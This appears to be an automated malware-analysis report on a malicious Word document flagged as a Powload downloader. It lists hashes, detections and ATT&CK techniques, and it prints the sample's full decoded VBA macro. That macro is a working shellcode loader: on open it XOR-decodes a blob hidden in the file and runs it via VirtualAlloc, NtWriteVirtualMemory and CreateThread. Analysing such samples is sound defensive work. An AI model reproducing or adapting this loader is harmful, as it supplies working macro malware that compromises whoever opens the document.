Office (OLE) malware analysis — malicious · 53f9e37fc3054314

MALICIOUS

Office (OLE)

37.7 KB Created: 2017-07-28 08:08:00 Authoring application: Microsoft Office Word First seen: 2017-08-08

MD5: b838f84f327a1b3d641e869cb8de52a8 SHA-1: 8d1339c1bfebcbe7116958e72de46c6a1eed9a35 SHA-256: 53f9e37fc3054314952abf40a7672c1e7fcaf0c20eb0c03cc5a18fdf512bdd84

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Office document containing VBA macros, including a Document_Open macro, which is a common technique for initiating malicious actions upon opening. The presence of VirtualAlloc API calls and references to CreateThread suggests the macro is designed to allocate memory and execute code, likely a downloaded payload. The ClamAV detection 'Doc.Downloader.Powload-6809817-0' further supports the downloader functionality.

Heuristics 7

ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Public Sub Document_Open()
    uTSmoFniSpfgwHfkvcvhrV
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
    Document_Open
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4908 bytes
SHA-256: `31e7a68b48fa663250664b76ea50c7d86a1ea18c9af1b2f7a54e12009d3740ba`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit #If VBA7 Then Private Declare PtrSafe Function aBOLlxdwLqdokKAAF Lib "kernel32" Alias "CreateThread" (ByVal LxCSfRgkugoLMwJh As Long, ByVal CawWwNupMfXtckzoNLVUPsX As Long, ByVal lSYTKfVevGeCrApJiDtLiRrVOwZKO As LongPtr, WkdxKEPAEGk As Long, ByVal XvfWXmwlLmYlQuAcfogkqiJUzT As Long, LUIYNAqTVPRzNnCAKlRHqdNuq As Long) As LongPtr Private Declare PtrSafe Function nOtWOIZIHmz Lib "kernel32" Alias "VirtualAlloc" (ByVal iEasIpGe As Long, ByVal bQLLnXqMfzomNWyoxQkNMji As LongPtr, ByVal yfVtjcxOd As Long, ByVal MJhIjRyWNTdUuHBdlzwqaSHCmicXC As Long) As LongPtr Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cAiPkP As LongPtr, ByVal OHspQvof As LongPtr, ByVal KoRgQXsMXTbEvaPBtJR As String, ByVal LEwLVwRdbkxsxIxOfw As LongPtr, ByRef eiwSrOCtHDN As LongPtr) As LongPtr #Else Private Declare Function aBOLlxdwLqdokKAAF Lib "kernel32" Alias "CreateThread" (ByVal LxCSfRgkugoLMwJh As Long, ByVal CawWwNupMfXtckzoNLVUPsX As Long, ByVal lSYTKfVevGeCrApJiDtLiRrVOwZKO As Long, WkdxKEPAEGk As Long, ByVal XvfWXmwlLmYlQuAcfogkqiJUzT As Long, LUIYNAqTVPRzNnCAKlRHqdNuq As Long) As Long Private Declare Function nOtWOIZIHmz Lib "kernel32" Alias "VirtualAlloc" (ByVal iEasIpGe As Long, ByVal bQLLnXqMfzomNWyoxQkNMji As Long, ByVal yfVtjcxOd As Long, ByVal MJhIjRyWNTdUuHBdlzwqaSHCmicXC As Long) As Long Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cAiPkP As Long, ByVal OHspQvof As Long, ByVal KoRgQXsMXTbEvaPBtJR As String, ByVal LEwLVwRdbkxsxIxOfw As Long, ByRef eiwSrOCtHDN As Long) As Long #End If Const sckpaQTSRgMYnzWKFbDHoYAA = &H1000 Const FIiesmsBxKoQlJvyKY = &H40 Public Sub uTSmoFniSpfgwHfkvcvhrV() Dim aGbGORClmBS() As Byte aGbGORClmBS = xPzCPBDrWpgddTZcUATUlrbMTL(ActiveDocument.FullName) Dim cHfPNaUIaiMHt As String cHfPNaUIaiMHt = StrConv(aGbGORClmBS, 64) Dim BtgiaryFSGnYyrqdSFEqdCqmHgwn BtgiaryFSGnYyrqdSFEqdCqmHgwn = Split(cHfPNaUIaiMHt, "PiaHLVgiQGcpWIGUoExOaTOTlazIGKFSaExSQXyaMGSUdYmdethrYZYWuhwLwxCfakorkNergwcubTQmOvEmDnTbGBxJBNEodMUSJUSqoQlBXDVBqjXaTpCMqnLJpvPsSNroYYCTDnXMcsecFVssQDuNkhBwijbTaSJjmGDrGdxFsPKYiJdtcxCotDeRwgLtmeMjJ") Dim RTtmSpjeeAA As String Dim qgjDHFGfOMIdVCkWAbaFnllkHobqZ As String Dim ZECGKbPkxxRAYeaPJ As String qgjDHFGfOMIdVCkWAbaFnllkHobqZ = StrConv(StrConv(BtgiaryFSGnYyrqdSFEqdCqmHgwn(UBound(BtgiaryFSGnYyrqdSFEqdCqmHgwn)), 64), 128) ZECGKbPkxxRAYeaPJ = Mid$(qgjDHFGfOMIdVCkWAbaFnllkHobqZ, 3, Len(qgjDHFGfOMIdVCkWAbaFnllkHobqZ)) RTtmSpjeeAA = LubLpDMeUYWt("QZsaLNgPvuwDnzfHQDquQJCLVArd", ZECGKbPkxxRAYeaPJ) #If VBA7 Then Dim RnZDvcCB As LongPtr Dim nztBKMuiLOzTuwPPITts As LongPtr #Else Dim RnZDvcCB As Long Dim nztBKMuiLOzTuwPPITts As Long #End If RnZDvcCB = nOtWOIZIHmz(0, Len(RTtmSpjeeAA), sckpaQTSRgMYnzWKFbDHoYAA, FIiesmsBxKoQlJvyKY) nztBKMuiLOzTuwPPITts = NtWriteVirtualMemory(-1, RnZDvcCB, RTtmSpjeeAA, Len(RTtmSpjeeAA), 0) nztBKMuiLOzTuwPPITts = aBOLlxdwLqdokKAAF(0, 0, RnZDvcCB, 0, 0, 0) End Sub Public Function xPzCPBDrWpgddTZcUATUlrbMTL(ByVal bhZOedxGNRJSFTVrBNpj As String) As Byte() Dim qgjDHFGfOMIdVCkWAbaFnllkHobqZ As Long Dim ZECGKbPkxxRAYeaPJ() As Byte qgjDHFGfOMIdVCkWAbaFnllkHobqZ = FreeFile If LenB(Dir(bhZOedxGNRJSFTVrBNpj)) Then Open bhZOedxGNRJSFTVrBNpj For Binary Access Read As qgjDHFGfOMIdVCkWAbaFnllkHobqZ ReDim ZECGKbPkxxRAYeaPJ(LOF(qgjDHFGfOMIdVCkWAbaFnllkHobqZ) - 1&) As Byte Get qgjDHFGfOMIdVCkWAbaFnllkHobqZ, , ZECGKbPkxxRAYeaPJ Close qgjDHFGfOMIdVCkWAbaFnllkHobqZ Else Err.Raise 53 End If xPzCPBDrWpgddTZcUATUlrbMTL = ZECGKbPkxxRAYeaPJ Erase ZECGKbPkxxRAYeaPJ End Function Public Sub Document_Open() uTSmoFniSpfgwHfkvcvhrV End Sub Sub Workbook_Open() Document_Open End Sub Public Function LubLpDMeUYWt(pfpNeApRihpEDOMmgkS As String, LFFxnoZTGgQodTBuJrV As String) As String Dim tyCnLgLPZRO As Long Dim dOSKARzPBvlcqbBKmsDPoDlm As String Dim sMhCjU As Integer, hnHnAOfjEuvqClxvbghPy As Integer, a As Long For tyCnLgLPZRO = 1 To Len(LFFxnoZTGgQodTBuJrV) a = tyCnLgLPZRO Mod Len(pfpNeApRihpEDOMmgkS) If a = 0 Then a = Len(pfpNeApRihpEDOMmgkS) sMhCjU = Asc(Mid$(LFFxnoZTGgQodTBuJrV, tyCnLgLPZRO, 1)) hnHnAOfjEuvqClxvbghPy = Asc(Mid$(pfpNeApRihpEDOMmgkS, a, 1)) dOSKARzPBvlcqbBKmsDPoDlm = dOSKARzPBvlcqbBKmsDPoDlm + Chr(sMhCjU Xor hnHnAOfjEuvqClxvbghPy) Next tyCnLgLPZRO LubLpDMeUYWt = dOSKARzPBvlcqbBKmsDPoDlm End Function

Open this report in the interactive analyzer, or submit your own file for analysis.